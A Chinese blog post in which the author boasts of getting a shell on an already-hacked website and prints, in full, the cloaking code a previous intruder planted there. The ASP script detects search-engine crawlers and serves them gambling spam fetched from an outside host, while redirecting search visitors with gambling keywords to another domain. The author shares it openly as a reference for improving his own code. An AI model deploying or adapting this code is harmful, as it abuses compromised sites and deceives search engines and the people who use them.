Leave a comment (0) 作者：adwin

最新战报：
刚刚截获一个已经被日烂的站点，经过仔细观察，发现这个站点已经被各路神圣用作强奸蜘蛛的工具了：在百度的搜索结果中看到的内容（快照）是赌球啊啥的，但是点进去就是正常的页面了（好像和我的需求还差那么一点？）。于是乎当我搞到这个网站的shell之后就开始找那位前辈用来强奸蜘蛛的代码是啥样的，终于发现如下代码：

<%
function hasKey()
dim urlrefer,i,searray
urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
hasKey= false
if urlrefer="" then fromse= false
searray=array("%e7%9c%9f%e9%92%b1%e6%b8%b8%e6%88%8f","%e9%be%99%e8%99%8e%e6%96%97","%e7%9c%9f%e9%92%b1%e9%be%99%e8%99%8e%e6%96%97","%e8%b4%a2%e7%a5%9e%e5%8d%9a%e5%bd%a9%e7%bd%91","%e8%b4%a2%e7%a5%9e%e5%8d%9a%e5%bd%a9,%d5%e6%c7%ae%d3%ce%cf%b7","%d5%e6%c7%ae%c1%fa%bb%a2%b6%b7","%b2%c6%c9%f1%b2%a9%b2%ca%cd%f8","%b2%c6%c9%f1%b2%a9%b2%ca")
for i=0 to ubound(searray)
if (instr(urlrefer,searray(i))>0) then hasKey=true
next
end function

function fromse()
dim urlrefer,i,searray
urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false
if urlrefer="" then fromse= false
searray=array("google","baidu","sogou","yahoo","soso")
for i=0 to ubound(searray)
if (instr(urlrefer,searray(i))>0) then fromse=true
next
end function

function isspider()
dim agent,searray,i
agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogou","yahoo","soso")
isspider= false
for i=0 to ubound(searray)
if (instr(agent,searray(i))>0) then isspider=true
next
end function

function gethttp(url)
  dim http
  set http=createobject("MSXML2.XMLHTTP")
  Http.open "GET",url,false
  Http.send()
  if Http.readystate<>4 then
    exit function
  end if
  gethttp=bytes2BSTR(Http.responseBody)
  set http=nothing
  if err.number<>0 then err.Clear
end function

function bytes2BSTR(vIn)
  dim strReturn
  dim i,ThisCharCode,NextCharCode
  strReturn = ""
  For i = 1 To LenB(vIn)
  ThisCharCode = AscB(MidB(vIn,i,1))
  If ThisCharCode < &H80 Then
  strReturn = strReturn & Chr(ThisCharCode)
  Else
  NextCharCode = AscB(MidB(vIn,i+1,1))
  strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
  i = i + 1
  End If
  Next
  bytes2BSTR = strReturn
End function

if(fromse() and hasKey()) then
  Response.Redirect ("http://www.okadwin.com")
end if

if(isspider()) then
    dim myfso,fileurl,filecon,myfile,remotehtml,bodyurl
    bodyurl="http://www.okadwin.com/f4ck.htm"
    response.clear
    remotehtml=gethttp(bodyurl)
    response.write(remotehtml)
    response.write("<!--"&now()&"-->")
    response.flush
end if

%>

这代码毕竟是前辈正在用的，我的那个代码是我自己搞的，相比之下肯定有不足之处，所以这段代码也发出来做个参考，以便改进，嘎嘎。